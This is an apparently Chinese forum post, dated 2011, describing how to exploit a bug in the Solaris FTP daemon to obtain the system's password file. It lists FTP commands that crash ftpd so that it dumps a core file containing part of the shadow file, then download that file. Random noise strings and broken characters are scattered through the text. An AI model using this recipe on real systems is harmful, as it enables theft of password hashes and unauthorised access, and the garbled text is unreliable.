該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG�,使得用戶可以獲得該機(jī)的口令文件。具體過程如下:- Q, ~4 x/ M7 G M7 _: q
; C' u9 |/ ]0 }/ @) k/ L7 F1.通過 ftp 正常登錄到目的主機(jī)上
+ u1 K, A) E0 _" x2 x+ J0 _! U, J8 D. n
2.輸入如下命令序列:6 F3 X1 [$ j. b8 |8 T+ E2 ^% ?
# z& i0 k8 t4 l* Y% X4 O: R
ftp> user root wrongpasswd8 p/ F+ R7 T% ^5 @8 h; l! @
% f; z5 H# H8 V9 @ftp> quote pasv3 p3 R3 @; {( F# u' d
T4 `: I3 G) ]3.這時(shí)���,ftpd會(huì)報(bào)錯(cuò)退出��,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core���,口令文件就包含在這個(gè)core中。* U+ m2 X) Z9 c. n- \9 `5 z
, \ E# u* N/ L% v
4.再次進(jìn)入FTP >get core, G* {( i Z2 y1 r
. r! Z% W: x6 j$ m1 M( m- d補(bǔ)充:雖然在core只有一部分shadow�,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了9 o- Z9 L% ? W( y1 i- \
6 x: K6 K, n; g( V% f( K
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡